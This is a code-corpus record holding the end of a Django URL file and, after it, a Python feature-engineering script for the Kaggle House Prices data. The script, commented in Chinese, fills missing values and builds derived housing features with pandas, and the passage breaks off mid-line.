  path('unfollow/', views.unfollow, name='unfollow'),\n]\n","repo_name":"Maloy-Baroi/PicBin","sub_path":"App_Login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"40149377990","text":"####################################################################################################################\r\n\r\nimport numpy as np \r\nimport pandas as pd \r\nimport xgboost as xgb\r\nfrom subprocess import check_output\r\nfrom sklearn.model_selection import cross_val_score, train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LinearRegression, RidgeCV, LassoCV, ElasticNetCV\r\nfrom sklearn.metrics import mean_squared_error, make_scorer\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom scipy.stats import skew\r\nfrom IPython.display import display\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.metrics import mean_squared_error\r\ndef rmse(y_true, y_pred):\r\n    return np.sqrt(mean_squared_error(y_true, y_pred))\r\n\r\n################################################### 读入数据 #############################################################\r\n\r\n\r\ntrain_data = pd.read_csv(\"../input/train.csv\")\r\ntest_data = pd.read_csv(\"../input/test.csv\")\r\n\r\n\r\n################################################### 特征补全 #############################################################\r\n\r\n# 补全LotFrontage\r\n# 通过计算其与LotArea的关系可以知道其有一定相关性,所以用边长补充,好像除以1.5就差不多了\r\n# (法一)缺失值用房屋边长补全\r\ntest_data['SqrtLotArea'] = np.sqrt(test_data['LotArea'])\r\ntrain_data['SqrtLotArea'] = np.sqrt(train_data['LotArea'])\r\ncond = test_data['LotFrontage'].isnull()\r\ntest_data.LotFrontage[cond] = test_data.SqrtLotArea[cond] \r\ndel test_data['SqrtLotArea']\r\ndel train_data['SqrtLotArea']\r\n# (法二)缺失值用中位数来补全\r\n# test_data.LotFrontage[cond] = test_data['LotFrontage'].median()\r\n# (法三)其实缺失值和log(LotArea)相关系数更高(还没有尝试)\r\n# (法四)用分组的中位数填充\r\ntmp = pd.DataFrame(index = train_data.index)\r\nlot_frontage_by_neighborhood = 
train_data['LotFrontage'].groupby(train_data['Neighborhood'])\r\ntmp['LotFrontage'] = train_data['LotFrontage']\r\ntmp['Neighborhood'] = train_data['Neighborhood']\r\nfor key, group in lot_frontage_by_neighborhood:\r\n idx = (tmp['Neighborhood'] == key) & (tmp['LotFrontage'].isnull())\r\n train_data.loc[idx, 'LotFrontage'] = group.median() \r\n\r\n# 补全MSZoning\r\n# 在test测试集中有缺失, train中没有\r\n# MSSubClass,MSZoning有一定关系\r\n# pd.crosstab(test_data.MSSubClass, test_data.MSZoning)\r\n# test_data中建筑类型缺失值补齐 30:RM 20:RL 70:RM\r\ntest_data.loc[test_data['MSSubClass'] == 20, 'MSZoning'] = 'RL'\r\ntest_data.loc[test_data['MSSubClass'] == 30, 'MSZoning'] = 'RM'\r\ntest_data.loc[test_data['MSSubClass'] == 70, 'MSZoning'] = 'RM'\r\n\r\n\r\n# 补全Exterior1st & Exterior2nd\r\n# 只在test中出现缺失值(nans only appear in test set)\r\n# 检查Exterior1st 和 Exterior2nd 是否存在缺失值共现的情况\r\n# 这里两个补全的值分别是选择了整体的众数和按年份分组的众数,可以调整\r\n#test_data.loc[test_data['Exterior1st'].isnull(), 'Exterior1st'] = 'VinylSd'\r\n#test_data.loc[test_data['Exterior2nd'].isnull(), 'Exterior2nd'] = 'VinylSd'\r\ntest_data.loc[test_data['Exterior1st'].isnull(), 'Exterior1st'] = 'Wd Sdng'\r\ntest_data.loc[test_data['Exterior2nd'].isnull(), 'Exterior2nd'] = 'Wd Sdng'\r\n\r\n\r\n# 补全KitchenQual\r\n# 只在测试集中有缺失值\r\ntest_data.loc[test_data['KitchenQual'].isnull(), 'KitchenQual'] = 'TA'\r\n\r\n# 补全Functional\r\n# 只在测试集中有缺失值\r\n# 填充一个最常见的值\r\ntest_data.loc[test_data['Functional'].isnull(), 'Functional'] = 'Typ'\r\n\r\n# 补全basement\r\nbasement_cols = ['BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2', 'BsmtFinSF1', 'BsmtFinSF2']\r\nfor cols in basement_cols:\r\n if 'FinFS' not in cols:#判断字段中是否包含'FinFS'\r\n train_data.loc[train_data[cols].isnull(), cols] = 'None'\r\nbasement_cols = ['Id', 'BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2']\r\n# 其中,有三行只有BsmtCond为NaN,该三行的其他列均有值 580 725 1064\r\ntest_data.loc[test_data['Id'] == 580, 'BsmtCond'] = 'TA'\r\ntest_data.loc[test_data['Id'] == 725, 'BsmtCond'] = 'TA'\r\ntest_data.loc[test_data['Id'] == 1064, 'BsmtCond'] = 'TA'\r\nfor cols in basement_cols:\r\n if cols not in 'SF' and cols not in 'Bath':\r\n test_data.loc[test_data['BsmtFinSF1'] == 0.0, cols] = 'None'\r\nfor cols in basement_cols:\r\n if test_data[cols].dtype == np.object:\r\n test_data.loc[test_data[cols].isnull(), cols] = 'None'\r\n else:\r\n test_data.loc[test_data[cols].isnull(), cols] = 0.0\r\n\r\n\r\n# 补全Garage 车库\r\ngarage_cols = ['GarageType', 'GarageQual', 'GarageCond', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea']\r\nfor cols in garage_cols:\r\n if train_data[cols].dtype == np.object:\r\n train_data.loc[train_data[cols].isnull(), cols] = 'None'\r\n else:\r\n train_data.loc[train_data[cols].isnull(), cols] = 0\r\n\r\ngarage_cols = ['GarageType', 'GarageQual', 'GarageCond', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea']\r\nfor cols in garage_cols:\r\n if test_data[cols].dtype == np.object:\r\n test_data.loc[test_data[cols].isnull(), cols] = 'None'\r\n else:\r\n test_data.loc[test_data[cols].isnull(), cols] = 0\r\ntest_data.loc[666, \"GarageQual\"] = \"TA\"\r\ntest_data.loc[666, \"GarageCond\"] = \"TA\"\r\ntest_data.loc[666, \"GarageFinish\"] = \"Unf\"\r\ntest_data.loc[666, \"GarageYrBlt\"] = \"1980\"\r\n\r\n# 补全SaleType\r\n# nans only appear in test set\r\ntest_data.loc[test_data['SaleType'].isnull(), 'SaleType'] = 'WD'\r\n\r\n# 补全Electrical\r\n# nans only appear in train set\r\ntrain_data.loc[train_data['Electrical'].isnull(), 'Electrical'] = 
'SBrkr'\r\n\r\n\r\ntest_data.loc[test_data['MasVnrType'].isnull(), 'MasVnrType'] = 'None'\r\ntrain_data.loc[train_data['MasVnrType'].isnull(), 'MasVnrType'] = 'None'\r\ntest_data.loc[test_data['FireplaceQu'].isnull(), 'FireplaceQu'] = 'None'\r\ntrain_data.loc[train_data['FireplaceQu'].isnull(), 'FireplaceQu'] = 'None'\r\ntest_data.loc[test_data['Fence'].isnull(), 'Fence'] = 'None'\r\ntrain_data.loc[train_data['Fence'].isnull(), 'Fence'] = 'None'\r\ntest_data.loc[test_data['MiscFeature'].isnull(), 'MiscFeature'] = 'None'\r\ntrain_data.loc[train_data['MiscFeature'].isnull(), 'MiscFeature'] = 'None'\r\ntest_data.loc[test_data['MasVnrArea'].isnull(), 'MasVnrArea'] = 0.0\r\ntrain_data.loc[train_data['MasVnrArea'].isnull(), 'MasVnrArea'] = 0.0\r\ntest_data.loc[test_data['BsmtFinSF1'].isnull(), 'BsmtFinSF1'] = '0'\r\ntest_data.loc[test_data['BsmtFinSF2'].isnull(), 'BsmtFinSF2'] = '0'\r\ntest_data.loc[test_data['BsmtUnfSF'].isnull(), 'BsmtUnfSF'] = '0'\r\ntest_data.loc[test_data['TotalBsmtSF'].isnull(), 'TotalBsmtSF'] = '0'\r\ntest_data.loc[test_data['BsmtFullBath'].isnull(), 'BsmtFullBath'] = 0\r\ntest_data.loc[test_data['BsmtHalfBath'].isnull(), 'BsmtHalfBath'] = 0\r\n\r\n################################################### 特征转换 #############################################################\r\n\r\ntrain_data = train_data.replace({\"MSSubClass\": {20: \"A\", 30: \"B\", 40: \"C\", 45: \"D\", 50: \"E\",\r\n 60: \"F\", 70: \"G\", 75: \"H\", 80: \"I\", 85: \"J\",\r\n 90: \"K\", 120: \"L\", 150: \"M\", 160: \"N\", 180: \"O\", 190: \"P\"}})\r\ntest_data = test_data.replace({\"MSSubClass\": {20: \"A\", 30: \"B\", 40: \"C\", 45: \"D\", 50: \"E\",\r\n 60: \"F\", 70: \"G\", 75: \"H\", 80: \"I\", 85: \"J\",\r\n 90: \"K\", 120: \"L\", 150: \"M\", 160: \"N\", 180: \"O\", 190: \"P\"}})\r\n\r\n\r\ntrain_data = train_data.replace({\"Alley\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"BsmtCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"BsmtExposure\" : {\"No\" : 0, \"Mn\" : 1, \"Av\": 2, \"Gd\" : 3},\r\n \"BsmtFinType1\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtFinType2\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"ExterCond\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"ExterQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"FireplaceQu\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"Functional\" : {\"Sal\" : 1, \"Sev\" : 2, \"Maj2\" : 3, \"Maj1\" : 4, \"Mod\": 5, \r\n \"Min2\" : 6, \"Min1\" : 7, \"Typ\" : 8},\r\n \"GarageCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"GarageQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5, \"None\" : 0},\r\n \"HeatingQC\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"KitchenQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"LandSlope\" : {\"Sev\" : 1, \"Mod\" : 2, \"Gtl\" : 3},\r\n \"LotShape\" : {\"IR3\" : 1, \"IR2\" : 2, \"IR1\" : 3, \"Reg\" : 4},\r\n \"PavedDrive\" : {\"N\" : 0, \"P\" : 1, \"Y\" : 2},\r\n \"Street\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"Utilities\" : {\"ELO\" : 1, \"NoSeWa\" : 2, \"NoSewr\" : 3, \"AllPub\" : 4}}\r\n )\r\n\r\ntest_data = test_data.replace({\"Alley\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n 
\"BsmtCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"BsmtExposure\" : {\"No\" : 0, \"Mn\" : 1, \"Av\": 2, \"Gd\" : 3},\r\n \"BsmtFinType1\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtFinType2\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"ExterCond\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"ExterQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"FireplaceQu\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"Functional\" : {\"Sal\" : 1, \"Sev\" : 2, \"Maj2\" : 3, \"Maj1\" : 4, \"Mod\": 5, \r\n \"Min2\" : 6, \"Min1\" : 7, \"Typ\" : 8},\r\n \"GarageCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"GarageQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5, \"None\" : 0},\r\n \"HeatingQC\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"KitchenQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"LandSlope\" : {\"Sev\" : 1, \"Mod\" : 2, \"Gtl\" : 3},\r\n \"LotShape\" : {\"IR3\" : 1, \"IR2\" : 2, \"IR1\" : 3, \"Reg\" : 4},\r\n \"PavedDrive\" : {\"N\" : 0, \"P\" : 1, \"Y\" : 2},\r\n \"Street\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"Utilities\" : {\"ELO\" : 1, \"NoSeWa\" : 2, \"NoSewr\" : 3, \"AllPub\" : 4}}\r\n )\r\n\r\n################################################### 统一两个数据的类型 #############################################################\r\n\r\n# 一部分是int64,一部分是float64\r\nc = ['BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'BsmtFullBath', 'BsmtHalfBath', 'GarageCars', 'GarageArea']\r\nfor cols in c:\r\n tmp_col = test_data[cols].astype(pd.np.int64)\r\n tmp_col = pd.DataFrame({cols: tmp_col})\r\n del test_data[cols]\r\n test_data = pd.concat((test_data, tmp_col), axis=1) \r\n\r\n\r\n################################################### 新增特征 #############################################################\r\n\r\ntrain_data['1stFlr_2ndFlr_Sf'] = np.log1p(train_data['1stFlrSF'] + train_data['2ndFlrSF'])\r\ntest_data['1stFlr_2ndFlr_Sf'] = np.log1p(test_data['1stFlrSF'] + test_data['2ndFlrSF'])\r\n\r\ntrain_data['All_Liv_SF'] = np.log1p(train_data['1stFlr_2ndFlr_Sf'] + train_data['LowQualFinSF'] + train_data['GrLivArea'])\r\ntest_data['All_Liv_SF'] = np.log1p(test_data['1stFlr_2ndFlr_Sf'] + test_data['LowQualFinSF'] + test_data['GrLivArea'])\r\n\r\ntrain_data.drop(['1stFlrSF'], axis = 1)\r\ntest_data.drop(['1stFlrSF'], axis = 1)\r\ntrain_data.drop(['2ndFlrSF'], axis = 1)\r\ntest_data.drop(['2ndFlrSF'], axis = 1)\r\n\r\n\r\ntest_data[\"SaleCondition_PriceDown\"] = test_data.SaleCondition.replace(\r\n {'Abnorml': 1, 'Alloca': 1, 'AdjLand': 1, 'Family': 1, 'Normal': 0, 'Partial': 0})\r\n\r\ntrain_data[\"SaleCondition_PriceDown\"] = train_data.SaleCondition.replace(\r\n {'Abnorml': 1, 'Alloca': 1, 'AdjLand': 1, 'Family': 1, 'Normal': 0, 'Partial': 0})\r\n\r\n\r\ntrain_data['SimplOverallQual'] = train_data.OverallQual.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntrain_data['SimplOverallCond'] = train_data.OverallCond.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntrain_data['SimplPoolQC'] = 
train_data.PoolQC.replace({1 : 1, 2 : 1, # average\r\n 3 : 2, 4 : 2 # good\r\n })\r\ntrain_data['SimplGarageCond'] = train_data.GarageCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplGarageQual'] = train_data.GarageQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFireplaceQu'] = train_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFireplaceQu'] = train_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFunctional'] = train_data.Functional.replace({1 : 1, 2 : 1, # bad\r\n 3 : 2, 4 : 2, # major\r\n 5 : 3, 6 : 3, 7 : 3, # minor\r\n 8 : 4 # typical\r\n })\r\ntrain_data['SimplKitchenQual'] = train_data.KitchenQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplHeatingQC'] = train_data.HeatingQC.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplBsmtFinType1'] = train_data.BsmtFinType1.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntrain_data['SimplBsmtFinType2'] = train_data.BsmtFinType2.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntrain_data['SimplBsmtCond'] = train_data.BsmtCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplBsmtQual'] = train_data.BsmtQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplExterCond'] = train_data.ExterCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplExterQual'] = train_data.ExterQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\n\r\n# 2* Combinations of existing features\r\n# Overall quality of the house\r\ntrain_data['OverallGrade'] = train_data['OverallQual'] * train_data['OverallCond']\r\n# Overall quality of the garage\r\ntrain_data['GarageGrade'] = train_data['GarageQual'] * train_data['GarageCond']\r\n# Overall quality of the exterior\r\ntrain_data['ExterGrade'] = train_data['ExterQual'] * train_data['ExterCond']\r\n# Overall kitchen score\r\ntrain_data['KitchenScore'] = train_data['KitchenAbvGr'] * train_data['KitchenQual']\r\n# Overall fireplace score\r\ntrain_data['FireplaceScore'] = train_data['Fireplaces'] * train_data['FireplaceQu']\r\n# Overall garage score\r\ntrain_data['GarageScore'] = train_data['GarageArea'] * train_data['GarageQual']\r\n# Overall pool score\r\ntrain_data['PoolScore'] = train_data['PoolArea'] * train_data['PoolQC']\r\n# Simplified overall quality of the house\r\ntrain_data['SimplOverallGrade'] = train_data['SimplOverallQual'] * train_data['SimplOverallCond']\r\n# Simplified overall quality of the exterior\r\ntrain_data['SimplExterGrade'] = train_data['SimplExterQual'] * train_data['SimplExterCond']\r\n# Simplified overall pool score\r\ntrain_data['SimplPoolScore'] = train_data['PoolArea'] * train_data['SimplPoolQC']\r\n# Simplified overall garage score\r\ntrain_data['SimplGarageScore'] = train_data['GarageArea'] * train_data['SimplGarageQual']\r\n# Simplified overall fireplace score\r\ntrain_data['SimplFireplaceScore'] = train_data['Fireplaces'] * train_data['SimplFireplaceQu']\r\n# Simplified overall kitchen score\r\ntrain_data['SimplKitchenScore'] = 
train_data['KitchenAbvGr'] * train_data['SimplKitchenQual']\r\n# Total number of bathrooms\r\ntrain_data['TotalBath'] = train_data['BsmtFullBath'] + (0.5 * train_data['BsmtHalfBath']) + \\\r\ntrain_data['FullBath'] + (0.5 * train_data['HalfBath'])\r\n# Total SF for house (incl. basement)\r\ntrain_data['AllSF'] = train_data['GrLivArea'] + train_data['TotalBsmtSF']\r\n# Total SF for 1st + 2nd floors\r\ntrain_data['AllFlrsSF'] = train_data['1stFlrSF'] + train_data['2ndFlrSF']\r\n# Total SF for porch\r\ntrain_data['AllPorchSF'] = train_data['OpenPorchSF'] + train_data['EnclosedPorch'] + \\\r\ntrain_data['3SsnPorch'] + train_data['ScreenPorch']\r\n# Has masonry veneer or not\r\ntrain_data['HasMasVnr'] = train_data.MasVnrType.replace({'BrkCmn' : 1, 'BrkFace' : 1, 'CBlock' : 1, \r\n 'Stone' : 1, 'None' : 0})\r\n# House completed before sale or not\r\ntrain_data['BoughtOffPlan'] = train_data.SaleCondition.replace({'Abnorml' : 0, 'Alloca' : 0, 'AdjLand' : 0, \r\n 'Family' : 0, 'Normal' : 0, 'Partial' : 1})\r\n\r\ntest_data['SimplOverallQual'] = test_data.OverallQual.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntest_data['SimplOverallCond'] = test_data.OverallCond.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntest_data['SimplPoolQC'] = test_data.PoolQC.replace({1 : 1, 2 : 1, # average\r\n 3 : 2, 4 : 2 # good\r\n })\r\ntest_data['SimplGarageCond'] = test_data.GarageCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplGarageQual'] = test_data.GarageQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFireplaceQu'] = test_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFireplaceQu'] = test_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFunctional'] = test_data.Functional.replace({1 : 1, 2 : 1, # bad\r\n 3 : 2, 4 : 2, # major\r\n 5 : 3, 6 : 3, 7 : 3, # minor\r\n 8 : 4 # typical\r\n })\r\ntest_data['SimplKitchenQual'] = test_data.KitchenQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplHeatingQC'] = test_data.HeatingQC.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplBsmtFinType1'] = test_data.BsmtFinType1.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntest_data['SimplBsmtFinType2'] = test_data.BsmtFinType2.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntest_data['SimplBsmtCond'] = test_data.BsmtCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplBsmtQual'] = test_data.BsmtQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplExterCond'] = test_data.ExterCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplExterQual'] = test_data.ExterQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\n\r\n# 2* Combinations of existing features\r\n# Overall quality of the house\r\ntest_data['OverallGrade'] = test_data['OverallQual'] * test_data['OverallCond']\r\n# Overall quality of the 
garage\r\ntest_data['GarageGrade'] = test_data['GarageQual'] * test_data['GarageCond']\r\n# Overall quality of the exterior\r\ntest_data['ExterGrade'] = test_data['ExterQual'] * test_data['ExterCond']\r\n# Overall kitchen score\r\ntest_data['KitchenScore'] = test_data['KitchenAbvGr'] * test_data['KitchenQual']\r\n# Overall fireplace score\r\ntest_data['FireplaceScore'] = test_data['Fireplaces'] * test_data['FireplaceQu']\r\n# Overall garage score\r\ntest_data['GarageScore'] = test_data['GarageArea'] * test_data['GarageQual']\r\n# Overall pool score\r\ntest_data['PoolScore'] = test_data['PoolArea'] * test_data['PoolQC']\r\n# Simplified overall quality of the house\r\ntest_data['SimplOverallGrade'] = test_data['SimplOverallQual'] * test_data['SimplOverallCond']\r\n# Simplified overall quality of the exterior\r\ntest_data['SimplExterGrade'] = test_data['SimplExterQual'] * test_data['SimplExterCond']\r\n# Simplified overall pool score\r\ntest_data['SimplPoolScore'] = test_data['PoolArea'] * test_data['SimplPoolQC']\r\n# Simplified overall garage score\r\ntest_data['SimplGarageScore'] = test_data['GarageArea'] * test_data['SimplGarageQual']\r\n# Simplified overall fireplace score\r\ntest_data['SimplFireplaceScore'] = test_data['Fireplaces'] * test_data['SimplFireplaceQu']\r\n# Simplified overall kitchen score\r\ntest_data['SimplKitchenScore'] = test_data['KitchenAbvGr'] * test_data['SimplKitchenQual']\r\n# Total number of bathrooms\r\ntest_data['TotalBath'] = test_data['BsmtFullBath'] + (0.5 * test_data['BsmtHalfBath']) + \\\r\ntest_data['FullBath'] + (0.5 * test_data['HalfBath'])\r\n# Total SF for house (incl. basement)\r\ntest_data['AllSF'] = test_data['GrLivArea'] + test_data['TotalBsmtSF']\r\n# Total SF for 1st + 2nd floors\r\ntest_data['AllFlrsSF'] = test_data['1stFlrSF'] + test_data['2ndFlrSF']\r\n# Total SF for porch\r\ntest_data['AllPorchSF'] = test_data['OpenPorchSF'] + test_data['EnclosedPorch'] + \\\r\ntest_data['3SsnPorch'] + test_data['ScreenPorch']\r\n# Has masonry veneer or not\r\ntest_data['HasMasVnr'] = test_data.MasVnrType.replace({'BrkCmn' : 1, 'BrkFace' : 1, 'CBlock' : 1, \r\n 'Stone' : 1, 'None' : 0})\r\n# House completed before sale or not\r\ntest_data['BoughtOffPlan'] = test_data.SaleCondition.replace({'Abnorml' : 0, 'Alloca' : 0, 'AdjLand' : 0, \r\n 'Family' : 0, 'Normal' : 0, 'Partial' : 1})\r\ntrain_data['OverallQual-s2'] = train_data['OverallQual'] ** 2\r\ntrain_data['OverallQual-s3'] = train_data['OverallQual'] ** 3\r\ntrain_data['OverallQual-Sq'] = np.sqrt(train_data['OverallQual'])\r\ntrain_data['AllSF-2'] = train_data['AllSF'] ** 2\r\ntrain_data['AllSF-3'] = train_data['AllSF'] ** 3\r\ntrain_data['AllSF-Sq'] = np.sqrt(train_data['AllSF'])\r\ntrain_data['AllFlrsSF-2'] = train_data['AllFlrsSF'] ** 2\r\ntrain_data['AllFlrsSF-3'] = train_data['AllFlrsSF'] ** 3\r\ntrain_data['AllFlrsSF-Sq'] = np.sqrt(train_data['AllFlrsSF'])\r\ntrain_data['GrLivArea-2'] = train_data['GrLivArea'] ** 2\r\ntrain_data['GrLivArea-3'] = train_data['GrLivArea'] ** 3\r\ntrain_data['GrLivArea-Sq'] = np.sqrt(train_data['GrLivArea'])\r\ntrain_data['SimplOverallQual-s2'] = train_data['SimplOverallQual'] ** 2\r\ntrain_data['SimplOverallQual-s3'] = train_data['SimplOverallQual'] ** 3\r\ntrain_data['SimplOverallQual-Sq'] = np.sqrt(train_data['SimplOverallQual'])\r\ntrain_data['ExterQual-2'] = train_data['ExterQual'] ** 2\r\ntrain_data['ExterQual-3'] = train_data['ExterQual'] ** 3\r\ntrain_data['ExterQual-Sq'] = np.sqrt(train_data['ExterQual'])\r\ntrain_data['GarageCars-2'] = train_data['GarageCars'] 
** 2\r\ntrain_data['GarageCars-3'] = train_data['GarageCars'] ** 3\r\ntrain_data['GarageCars-Sq'] = np.sqrt(train_data['GarageCars'])\r\ntrain_data['TotalBath-2'] = train_data['TotalBath'] ** 2\r\ntrain_data['TotalBath-3'] = train_data['TotalBath'] ** 3\r\ntrain_data['TotalBath-Sq'] = np.sqrt(train_data['TotalBath'])\r\ntrain_data['KitchenQual-2'] = train_data['KitchenQual'] ** 2\r\ntrain_data['KitchenQual-3'] = train_data['KitchenQual'] ** 3\r\ntrain_data['KitchenQual-Sq'] = np.sqrt(train_data['KitchenQual'])\r\ntrain_data['GarageScore-2'] = train_data['GarageScore'] ** 2\r\ntrain_data['GarageScore-3'] = train_data['GarageScore'] ** 3\r\ntrain_data['GarageScore-Sq'] = np.sqrt(train_data['GarageScore'])\r\ntest_data['OverallQual-s2'] = test_data['OverallQual'] ** 2\r\ntest_data['OverallQual-s3'] = test_data['OverallQual'] ** 3\r\ntest_data['OverallQual-Sq'] = np.sqrt(test_data['OverallQual'])\r\ntest_data['AllSF-2'] = test_data['AllSF'] ** 